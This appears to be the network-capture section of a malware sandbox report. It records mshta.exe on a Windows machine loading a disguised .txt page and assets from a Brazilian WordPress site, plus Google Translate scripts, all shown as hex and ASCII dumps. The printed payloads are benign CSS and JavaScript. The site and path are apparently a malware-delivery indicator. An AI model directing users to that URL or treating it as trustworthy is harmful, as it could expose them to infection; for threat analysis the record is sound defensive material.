09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 7a 6f 6f 6d 3a 20 31 3b 0a 09 2a 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 2f 2a 49 45 37 20 6c 69 66 65 2d 73 61 76 65 72 20 2a 2f 0a 7d 0a 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 63 6f 6e 74 72 6f 6c 73 20 2e 6f 77 6c 2d 70 61 67 65 20 73 70 61 6e 7b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 77 69 64 74 68 3a 20 31 32 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 31 32 70 78 3b 0a 09 6d 61 72 67 69 6e 3a 20 35 70 78 20 37 70 78 3b 0a 09 66 69 6c 74 65 72 3a 20 41 6c 70 68 61 28 4f 70 61 63 69 74 79 3d 35 30 29 3b 2f 2a 49 45 37 20 66 69 78 2a 2f 0a 09 6f 70 61 63 69 74 79 3a 20 30 2e 35 3b 0a 09 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 32 30 70 78 3b 0a 09 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 32 30 70 78 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
                                        Data Ascii: /** Owl Carousel Owl Demo Theme *v1.24*/.owl-theme .owl-controls{margin-top: 10px;text-align: center;}/* Styling Next and Prev buttons */.owl-theme .owl-controls .owl-buttons div{color: #FFF;display: inline-block;zoom: 1;*display: inline;/*IE7 life-saver */margin: 5px;padding: 3px 10px;font-size: 12px;-webkit-border-radius: 30px;-moz-border-radius: 30px;border-radius: 30px;background: #869791;filter: Alpha(Opacity=50);/*IE7 fix*/opacity: 0.5;}/* Clickable class fix problem with hover on touch devices *//* Use it for non-touch hover action */.owl-theme .owl-controls.clickable .owl-buttons div:hover{filter: Alpha(Opacity=100);/*IE7 fix*/opacity: 1;text-decoration: none;}/* Styling Pagination*/.owl-theme .owl-controls .owl-page{display: inline-block;zoom: 1;*display: inline;/*IE7 life-saver */}.owl-theme .owl-controls .owl-page span{display: block;width: 12px;height: 12px;margin: 5px 7px;filter: Alpha(Opacity=50);/*IE7 fix*/opacity: 0.5;-webkit-border-radius: 20px;-moz-border-radius: 20px;border-radius:
                                        Aug 16, 2022 10:48:43.491141081 CEST408INData Raw: 32 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 38 36 39 37 39 31 3b 0a 7d 0a 0a 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 63 6f 6e 74 72 6f 6c 73 20 2e 6f 77 6c 2d 70 61 67 65 2e 61 63 74 69 76 65 20 73 70 61 6e 2c 0a 2e 6f 77
                                        Data Ascii: 20px;background: #869791;}.owl-theme .owl-controls .owl-page.active span,.owl-theme .owl-controls.clickable .owl-page:hover span{filter: Alpha(Opacity=100);/*IE7 fix*/opacity: 1;}/* If PaginationNumbers is true */.owl-theme .owl


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        9192.168.2.2249184187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:43.437861919 CEST406OUTGET /wp-includes/js/wp-emoji-release.min.js?ver=4.9.20 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:43.665373087 CEST410INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:47:51 GMT
                                        Server: Apache
                                        ETag: "a55f41-2ea7-5c001a3bd78ff"
                                        Last-Modified: Thu, 15 Apr 2021 12:02:38 GMT
                                        Content-Length: 11943
                                        Content-Type: application/x-javascript
                                        X-Pad: avoid browser bug
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15664463 21929633
                                        Age: 52
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 74 77 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 76 61 72 20 74 77 65 6d 6f 6a 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 66 3d 7b 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 74 77 65 6d 6f 6a 69 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 32 2f 22 2c 65 78 74 3a 22 2e 70 6e 67 22 2c 73 69 7a 65 3a 22 37 32 78 37 32 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 65 6d 6f 6a 69 22 2c 63 6f 6e 76 65 72 74 3a 7b 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 64 29 7b 64 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 64 3f 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 3a 64 3b 69 66 28 64 3c 36 35 35 33 36 29 72 65 74 75 72 6e 20 61 28 64 29 3b 72 65 74 75 72 6e 20 61 28 35 35 32 39 36 2b 28 28 64 2d 3d 36 35 35 33 36 29 3e 3e 31 30 29 2c 35 36 33 32 30 2b 28 31 30 32 33 26 64 29 29 7d 2c 74 6f 43 6f 64 65 50 6f 69 6e 74 3a 69 7d 2c 6f 6e 65 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 67 28 74 68 69 73 2e 61 6c 74 2c 21 31 29 2c 74 68 69 73 29 7d 2c 70 61 72 73 65 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 75 29 7b 75 26 26 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 75 7c 7c 28 75 3d 7b 63 61 6c 6c 62 61 63 6b 3a 75 7d 29 3b 72 65 74 75 72 6e 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 64 3f 66 75 6e 63 74 69 6f 6e 28 64 2c 74 29 7b 72 65 74 75 72 6e 20 6f 28 64 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 75 2c 66 2c 65 3d 64 2c 63 3d 78 28 64 29 2c 61 3d 74 2e 63 61 6c 6c 62 61 63 6b 28 63 2c 74 29 3b 69 66 28 61 29 7b 66 6f 72 28 66 20 69 6e 20 65 3d 22 3c 69 6d 67 20 22 2e 63 6f 6e 63 61 74 28 27 63 6c 61 73 73 3d 22 27 2c 74 2e 63 6c 61 73 73 4e 61 6d 65 2c 27 22 20 27 2c 27 64 72 61 67 67 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 27 2c 27 61 6c 74 3d 22 27 2c 64 2c 27 22 27 2c 27 20 73 72 63 3d 22 27 2c 61 2c 27 22 27 29 2c 75 3d 74 2e 61 74 74 72 69 62 75 74 65 73 28 64 2c 63 29 29 75 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 66 29 26 26 30 21 3d 3d 66 2e 69 6e 64 65 78 4f 66 28 22 6f 6e 22 29 26 26 2d 31 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 20 22 2b 66 2b 22 3d 22 29 26 26 28 65 3d 65 2e 63 6f 6e 63 61 74 28 22 20 22 2c 66 2c 27 3d 22 27 2c 75 5b 66 5d 2e 72 65 70 6c 61 63 65 28 6e 2c 72 29 2c 27 22 27 29 29 3b 65 3d 65 2e 63 6f 6e 63 61 74 28 22 2f 3e 22 29 7d 72 65 74 75 72 6e 20 65 7d 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 75 29 7b 76 61 72 20 66 2c 65 2c 63 2c 61 2c 74 2c 6e 2c 72 2c 62 2c 6f 2c 69 2c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 20 64 28 75 2c 66 29 7b 76 61 72 20 65 2c 63 2c 61 3d 75 2e 63 68 69 6c 64 4e 6f 64 65 73 2c 74 3d 61 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 3b 74 2d 2d
                                        Data Ascii: // Source: wp-includes/js/twemoji.min.jsvar twemoji=function(){"use strict";var f={base:"https://twemoji.maxcdn.com/2/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return a(d);return a(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:i},onerror:function(){this.parentNode&&this.parentNode.replaceChild(g(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return("string"==typeof d?function(d,t){return o(d,function(d){var u,f,e=d,c=x(d),a=t.callback(c,t);if(a){for(f in e="<img ".concat('class="',t.className,'" ','draggable="false" ','alt="',d,'"',' src="',a,'"'),u=t.attributes(d,c))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===e.indexOf(" "+f+"=")&&(e=e.concat(" ",f,'="',u[f].replace(n,r),'"'));e=e.concat("/>")}return e})}:function(d,u){var f,e,c,a,t,n,r,b,o,i,s,l=function d(u,f){var e,c,a=u.childNodes,t=a.length;for(;t--
                                        Aug 16, 2022 10:48:43.665512085 CEST412INData Raw: 3b 29 65 3d 61 5b 74 5d 2c 33 3d 3d 3d 28 63 3d 65 2e 6e 6f 64 65 54 79 70 65 29 3f 66 2e 70 75 73 68 28 65 29 3a 31 21 3d 3d 63 7c 7c 22 6f 77 6e 65 72 53 56 47 45 6c 65 6d 65 6e 74 22 69 6e 20 65 7c 7c 68 2e 74 65 73 74 28 65 2e 6e 6f 64 65 4e
                                        Data Ascii: ;)e=a[t],3===(c=e.nodeType)?f.push(e):1!==c||"ownerSVGElement"in e||h.test(e.nodeName.toLowerCase())||d(e,f);return f}(d,[]),p=l.length;for(;p--;){for(c=!1,a=document.createDocumentFragment(),t=l[p],n=t.nodeValue,r=0;i=m.exec(n);){if((s=i.inde
                                        Aug 16, 2022 10:48:43.665648937 CEST413INData Raw: 75 64 64 62 33 5d 29 7c 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 63 62 5c 75 64 66 63 63 5d 7c 5c 75 64 38 33 64 5b 5c 75 64 64 37 34 5c 75 64 64 37 35 5d 7c 5c 75 32 36 66 39 29 28 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66
                                        Data Ascii: uddb3])|(?:\ud83c[\udfcb\udfcc]|\ud83d[\udd74\udd75]|\u26f9)((?:\ud83c[\udffb-\udfff]|\ufe0f)\u200d[\u2640\u2642]\ufe0f)|(?:\ud83c[\udfc3\udfc4\udfca]|\ud83d[\udc6e\udc71\udc73\udc77\udc81\udc82\udc86\udc87\ude45-\ude47\ude4b\ude4d\ude4e\udea3
                                        Aug 16, 2022 10:48:43.665735006 CEST414INData Raw: 36 39 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 37 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 36 5c 75 64 63 36 37 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 32 30 30
                                        Data Ascii: 69\u200d\ud83d\udc67\u200d\ud83d[\udc66\udc67]|\ud83d\udc69\u200d\ud83d\udc69\u200d\ud83d[\udc66\udc67]|\ud83c\udff3\ufe0f\u200d\ud83c\udf08|\ud83c\udff4\u200d\u2620\ufe0f|\ud83d\udc41\u200d\ud83d\udde8|\ud83d\udc68\u200d\ud83d[\udc66\udc67]|\
                                        Aug 16, 2022 10:48:43.665884018 CEST416INData Raw: 75 32 36 37 66 5c 75 32 36 39 32 2d 5c 75 32 36 39 37 5c 75 32 36 39 39 5c 75 32 36 39 62 5c 75 32 36 39 63 5c 75 32 36 61 30 5c 75 32 36 61 31 5c 75 32 36 61 61 5c 75 32 36 61 62 5c 75 32 36 62 30 5c 75 32 36 62 31 5c 75 32 36 62 64 5c 75 32 36
                                        Data Ascii: u267f\u2692-\u2697\u2699\u269b\u269c\u26a0\u26a1\u26aa\u26ab\u26b0\u26b1\u26bd\u26be\u26c4\u26c5\u26c8\u26cf\u26d1\u26d3\u26d4\u26e9\u26ea\u26f0-\u26f5\u26f8\u26fa\u26fd\u2702\u2708\u2709\u270f\u2712\u2714\u2716\u271d\u2721\u2733\u2734\u2744\u
                                        Aug 16, 2022 10:48:43.666008949 CEST417INData Raw: 75 64 64 66 30 2d 5c 75 64 64 66 35 5c 75 64 64 66 37 5c 75 64 64 66 61 2d 5c 75 64 64 66 66 5d 7c 5c 75 64 38 33 63 5c 75 64 64 65 39 5c 75 64 38 33 63 5b 5c 75 64 64 65 61 5c 75 64 64 65 63 5c 75 64 64 65 66 5c 75 64 64 66 30 5c 75 64 64 66 32
                                        Data Ascii: uddf0-\uddf5\uddf7\uddfa-\uddff]|\ud83c\udde9\ud83c[\uddea\uddec\uddef\uddf0\uddf2\uddf4\uddff]|\ud83c\uddea\ud83c[\udde6\udde8\uddea\uddec\udded\uddf7-\uddfa]|\ud83c\uddeb\ud83c[\uddee-\uddf0\uddf2\uddf4\uddf7]|\ud83c\uddec\ud83c[\udde6\udde7
                                        Aug 16, 2022 10:48:43.666163921 CEST419INData Raw: 64 65 36 5c 75 64 64 66 32 5c 75 64 64 66 63 5d 7c 5c 75 64 38 33 63 5b 5c 75 64 63 63 66 5c 75 64 64 38 65 5c 75 64 64 39 31 2d 5c 75 64 64 39 61 5c 75 64 64 65 36 2d 5c 75 64 64 66 66 5c 75 64 65 30 31 5c 75 64 65 33 32 2d 5c 75 64 65 33 36 5c
                                        Data Ascii: de6\uddf2\uddfc]|\ud83c[\udccf\udd8e\udd91-\udd9a\udde6-\uddff\ude01\ude32-\ude36\ude38-\ude3a\ude50\ude51\udf00-\udf20\udf2d-\udf35\udf37-\udf7c\udf7e-\udf84\udf86-\udf93\udfa0-\udfc1\udfc5\udfc6\udfc8\udfc9\udfcf-\udfd3\udfe0-\udff0\udff4\ud
                                        Aug 16, 2022 10:48:43.666366100 CEST420INData Raw: 2e 70 75 73 68 28 28 36 35 35 33 36 2b 28 63 2d 35 35 32 39 36 3c 3c 31 30 29 2b 28 65 2d 35 36 33 32 30 29 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2c 63 3d 30 29 3a 35 35 32 39 36 3c 3d 65 26 26 65 3c 3d 35 36 33 31 39 3f 63 3d 65 3a 66 2e
                                        Data Ascii: .push((65536+(c-55296<<10)+(e-56320)).toString(16)),c=0):55296<=e&&e<=56319?c=e:f.push(e.toString(16));return f.join(u||"-")}}();// Source: wp-includes/js/wp-emoji.min.js!function(c,l){c.wp=c.wp||{},c.wp.emoji=new function(){var n,u,e=c.Muta
                                        Aug 16, 2022 10:48:43.666568041 CEST421INData Raw: 7c 2f 5b 5c 75 32 30 33 43 5c 75 32 30 34 39 5c 75 32 30 45 33 5c 75 32 31 32 32 5c 75 32 31 33 39 5c 75 32 31 39 34 2d 5c 75 32 31 39 39 5c 75 32 31 41 39 5c 75 32 31 41 41 5c 75 32 33 30 30 5c 75 32 33 31 41 5c 75 32 33 31 42 5c 75 32 33 32 38
                                        Data Ascii: |/[\u203C\u2049\u20E3\u2122\u2139\u2194-\u2199\u21A9\u21AA\u2300\u231A\u231B\u2328\u2388\u23CF\u23E9-\u23F3\u23F8-\u23FA\u24C2\u25AA\u25AB\u25B6\u25C0\u25FB-\u25FE\u2600-\u2604\u260E\u2611\u2614\u2615\u2618\u261D\u2620\u2622\u2623\u2626\u262A\
                                        Aug 16, 2022 10:48:43.666743994 CEST422INData Raw: 6f 64 65 26 26 28 74 68 69 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 65 72 72 6f 72 22 2c 22 6c 6f 61 64 2d 66 61 69 6c 65 64 22 29 2c 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 61 2e 63 72
                                        Data Ascii: ode&&(this.setAttribute("data-error","load-failed"),n.parentNode.replaceChild(a.createTextNode(n.alt),n))}},"object"==typeof e.imgAttr&&(t.attributes=function(){return e.imgAttr}),n.parse(u,t)):u}return l&&(l.DOMReady?s():l.readyCallback=s),{p
                                        Aug 16, 2022 10:48:43.668477058 CEST422OUTGET /wp-content/plugins/cherry-parallax/css/parallax.css?ver=1.0.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:43.897418976 CEST424INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:43 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 02 Apr 2019 21:25:36 GMT
                                        ETag: "a4f8ac-193-58592c71f7400"
                                        Accept-Ranges: bytes
                                        Content-Length: 403
                                        Connection: close
                                        Content-Type: text/css
                                        Data Raw: 62 6f 64 79 20 2e 6d 61 69 6e 2d 68 6f 6c 64 65 72 20 7b 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 73 74 61 74 69 63 3b 0a 7d 0a 2e 70 61 72 61 6c 6c 61 78 2d 62 6f 78 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 7d 0a 2e 70 61 72 61 6c 6c 61 78 2d 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 7a 2d 69 6e 64 65 78 3a 20 32 3b 0a 7d 0a 2e 70 61 72 61 6c 6c 61 78 2d 62 67 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 09 74 6f 70 3a 20 30 3b 0a 09 6c 65 66 74 3a 20 30 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 7d 0a 2e 70 61 72 61 6c 6c 61 78 2d 62 67 2d 69 6e 6e 65 72 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 0a 7d
                                        Data Ascii: body .main-holder {overflow: hidden;position: static;}.parallax-box {position: relative;}.parallax-content {position: relative;z-index: 2;}.parallax-bg {position: absolute;overflow:hidden;top: 0;left: 0;width: 100%;height:100%;}.parallax-bg-inner {position:relative;background-repeat: no-repeat;background-size: cover;background-position: center;max-width:none;}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.2249180142.250.181.238443C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-08-16 08:48:42 UTC0OUTGET /translate_a/element.js?cb=googleTranslateElementInit2 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: translate.google.com
                                        Connection: Keep-Alive
                                        2022-08-16 08:48:42 UTC0INHTTP/1.1 200 OK
                                        Content-Type: text/javascript; charset=utf-8
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Tue, 16 Aug 2022 08:48:42 GMT
                                        Cross-Origin-Resource-Policy: cross-origin
                                        Cross-Origin-Opener-Policy: same-origin-allow-popups
                                        Server: ESF
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Set-Cookie: CONSENT=PENDING+957; expires=Thu, 15-Aug-2024 08:48:42 GMT; path=/; domain=.google.com; Secure
                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                        Accept-Ranges: none
                                        Vary: Accept-Encoding
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        2022-08-16 08:48:42 UTC1INData Raw: 38 30 30 30 0d 0a 0a 20 20 20 20 2f 2f 20 67 6f 2f 6d 73 73 2d 73 65 74 75 70 23 37 2d 6c 6f 61 64 2d 74 68 65 2d 6a 73 2d 6f 72 2d 63 73 73 2d 66 72 6f 6d 2d 79 6f 75 72 2d 69 6e 69 74 69 61 6c 2d 70 61 67 65 0a 20 20 20 20 69 66 28 21 77 69 6e 64 6f 77 5b 27 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 27 5d 29 20 7b 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 20 3d 20 77 69 6e 64 6f 77 5b 27 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 27 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 65 3b 0a 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 5b 27 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 27 5d 20 3d 20 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 3b 0a 20 20
                                        Data Ascii: 8000 // go/mss-setup#7-load-the-js-or-css-from-your-initial-page if(!window['_DumpException']) { const _DumpException = window['_DumpException'] || function(e) { throw e; }; window['_DumpException'] = _DumpException;
                                        2022-08-16 08:48:42 UTC1INData Raw: 54 72 61 63 65 29 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 28 74 68 69 73 2c 5f 2e 62 61 29 3b 65 6c 73 65 7b 76 61 72 20 63 3d 45 72 72 6f 72 28 29 2e 73 74 61 63 6b 3b 63 26 26 28 74 68 69 73 2e 73 74 61 63 6b 3d 63 29 7d 61 26 26 28 74 68 69 73 2e 6d 65 73 73 61 67 65 3d 53 74 72 69 6e 67 28 61 29 29 3b 76 6f 69 64 20 30 21 3d 3d 62 26 26 28 74 68 69 73 2e 63 61 75 73 65 3d 62 29 7d 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 71 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 61 3b 7d 2c 30 29 7d 3b 5f 2e 64 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 2e 50 26 26 61 2e 50 28 29 7d 3b 66 61 3d 66 75 6e 63 74 69
                                        Data Ascii: Trace)Error.captureStackTrace(this,_.ba);else{var c=Error().stack;c&&(this.stack=c)}a&&(this.message=String(a));void 0!==b&&(this.cause=b)};ca=function(a){_.q.setTimeout(function(){throw a;},0)};_.da=function(a){a&&"function"==typeof a.P&&a.P()};fa=functi
                                        2022-08-16 08:48:42 UTC3INData Raw: 28 29 7b 76 61 72 20 61 3d 5f 2e 71 2e 6e 61 76 69 67 61 74 6f 72 3b 72 65 74 75 72 6e 20 61 26 26 28 61 3d 61 2e 75 73 65 72 41 67 65 6e 74 29 3f 61 3a 22 22 7d 3b 5f 2e 75 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 2d 31 21 3d 5f 2e 44 61 28 29 2e 69 6e 64 65 78 4f 66 28 61 29 7d 3b 0a 5f 2e 45 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 75 28 22 54 72 69 64 65 6e 74 22 29 7c 7c 5f 2e 75 28 22 4d 53 49 45 22 29 7d 3b 5f 2e 46 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 75 28 22 69 50 68 6f 6e 65 22 29 26 26 21 5f 2e 75 28 22 69 50 6f 64 22 29 26 26 21 5f 2e 75 28 22 69 50 61 64 22 29 7d 3b 5f 2e 47 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 46 61 28 29 7c 7c 5f 2e 75 28 22
                                        Data Ascii: (){var a=_.q.navigator;return a&&(a=a.userAgent)?a:""};_.u=function(a){return-1!=_.Da().indexOf(a)};_.Ea=function(){return _.u("Trident")||_.u("MSIE")};_.Fa=function(){return _.u("iPhone")&&!_.u("iPod")&&!_.u("iPad")};_.Ga=function(){return _.Fa()||_.u("
                                        2022-08-16 08:48:42 UTC4INData Raw: 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b 53 61 3d 52 61 28 74 68 69 73 29 3b 0a 54 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 62 29 61 3a 7b
                                        Data Ascii: ect"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};Sa=Ra(this);Ta=function(a,b){if(b)a:{
                                        2022-08-16 08:48:42 UTC5INData Raw: 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 72 65 74 75 72 6e 20 62 3f 62 2e 63 61 6c 6c 28 61 29 3a 7b 6e 65 78 74 3a 50 61 28 61 29 7d 7d 3b 5f 2e 57 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 2c 63 3d 5b 5d 3b 21 28 62 3d 61 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 63 2e 70 75 73 68 28 62 2e 76 61 6c 75 65 29 3b 72 65 74 75 72 6e 20 63 7d 3b 58 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3f 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 3b 0a
